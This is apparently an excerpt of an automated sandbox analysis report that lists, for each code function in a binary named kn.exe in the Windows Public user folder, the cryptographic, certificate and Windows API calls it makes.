                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A392D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,6_2_00007FF6A2A392D8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A432D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF6A2A432D0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A292C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,6_2_00007FF6A2A292C4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29FB324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,6_2_00007FF6A29FB324
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29FD304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,6_2_00007FF6A29FD304
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,6_2_00007FF6A2A4D30C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29FD240 #357,CryptFindOIDInfo,#357,LocalFree,6_2_00007FF6A29FD240
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A632A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF6A2A632A8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A2B2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,6_2_00007FF6A2A2B2B4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A97290 NCryptIsKeyHandle,#359,#360,#357,#358,6_2_00007FF6A2A97290
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8D28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,6_2_00007FF6A2A8D28C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A797E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,6_2_00007FF6A2A797E4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A017D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,6_2_00007FF6A2A017D4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,6_2_00007FF6A2A4B808
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29FF810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF6A29FF810
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,6_2_00007FF6A2A8F7FC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A65768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6A2A65768
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A2F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,6_2_00007FF6A2A2F774
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,6_2_00007FF6A2A8D750
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A637A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6A2A637A4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A7B794 CryptExportPublicKeyInfoEx,SetLastError,6_2_00007FF6A2A7B794
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A3577C #360,#358,CryptDecodeObject,GetLastError,#357,6_2_00007FF6A2A3577C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29FD790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,6_2_00007FF6A29FD790
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29DB788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,6_2_00007FF6A29DB788
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A318DC CertFindExtension,CryptDecodeObject,GetLastError,#357,6_2_00007FF6A2A318DC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4B8D0 I_CryptGetLruEntryData,#357,6_2_00007FF6A2A4B8D0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E3918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A29E3918
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A6391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,6_2_00007FF6A2A6391C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,6_2_00007FF6A2A8F918
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D38FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF6A29D38FC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A63860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6A2A63860
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A5184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,6_2_00007FF6A2A5184C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,6_2_00007FF6A2A4D850
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A998B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6A2A998B0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F7884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,6_2_00007FF6A29F7884
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A39878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,6_2_00007FF6A2A39878
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A255F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,6_2_00007FF6A2A255F0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29ED5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A29ED5C2
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29EF630 CryptAcquireContextW,GetLastError,#357,SetLastError,6_2_00007FF6A29EF630
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A495FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,6_2_00007FF6A2A495FC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8F570 CryptHashCertificate,SetLastError,6_2_00007FF6A2A8F570
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A2B55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,6_2_00007FF6A2A2B55C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A63590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6A2A63590
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A99580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,6_2_00007FF6A2A99580
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A636E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6A2A636E8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,6_2_00007FF6A2A4F6D8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D5664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,6_2_00007FF6A29D5664
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A3366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,6_2_00007FF6A2A3366C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29ED660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,6_2_00007FF6A29ED660
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,6_2_00007FF6A2A4B664
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8F650 CryptHashCertificate2,SetLastError,6_2_00007FF6A2A8F650
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A63654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF6A2A63654
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A5F644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6A2A5F644
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A176B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6A2A176B0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A7D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,6_2_00007FF6A2A7D6A0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A89688 CryptFindOIDInfo,#357,#360,#360,#360,6_2_00007FF6A2A89688
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A63BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6A2A63BEB
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E9BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,6_2_00007FF6A29E9BC8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A6BBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF6A2A6BBC0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29FFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,6_2_00007FF6A29FFC20
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A1FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A2A1FC34
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A97B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,6_2_00007FF6A2A97B60
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,6_2_00007FF6A2A9BB50
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A6FB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,6_2_00007FF6A2A6FB50
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A2BB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A2A2BB38
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A95B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,6_2_00007FF6A2A95B44
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29C5BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6A29C5BA4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AC5B90 CryptDecodeObjectEx,memmove,6_2_00007FF6A2AC5B90
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29EBB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,6_2_00007FF6A29EBB80
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,6_2_00007FF6A2A8FB94
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A55CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,6_2_00007FF6A2A55CE8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8FD2C CryptDecryptMessage,GetLastError,#357,6_2_00007FF6A2A8FD2C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A7DD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,6_2_00007FF6A2A7DD1C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A13C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6A2A13C60
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AC5C54 CryptDecodeObjectEx,CryptDecodeObjectEx,6_2_00007FF6A2AC5C54
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A01C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,6_2_00007FF6A2A01C50
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A51C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,6_2_00007FF6A2A51C84
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,6_2_00007FF6A2A4B9CC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29EF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,6_2_00007FF6A29EF9B8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,6_2_00007FF6A2A9BA14
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A89970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,6_2_00007FF6A2A89970
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4B950 I_CryptGetLruEntryData,#357,6_2_00007FF6A2A4B950
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A1F944 CryptDecodeObject,GetLastError,#357,6_2_00007FF6A2A1F944
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2ABB980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,6_2_00007FF6A2ABB980
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,6_2_00007FF6A2A4597C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F7988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,6_2_00007FF6A29F7988
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A23B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,6_2_00007FF6A2A23B14
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A59AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF6A2A59AF8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A67A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6A2A67A70
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A79A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,6_2_00007FF6A2A79A58
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F3A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A29F3A40
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A7BA50 CryptSignCertificate,SetLastError,6_2_00007FF6A2A7BA50
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A61A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,6_2_00007FF6A2A61A44
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AC5AA8 CryptDecodeObjectEx,6_2_00007FF6A2AC5AA8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,6_2_00007FF6A2A8FA84
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AC5FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,6_2_00007FF6A2AC5FF0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F5FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF6A29F5FE8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29FFF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,6_2_00007FF6A29FFF64
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A35F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,6_2_00007FF6A2A35F54
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A65FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF6A2A65FA8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A69F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF6A2A69F90
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F60DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF6A29F60DA
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A34070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,6_2_00007FF6A2A34070
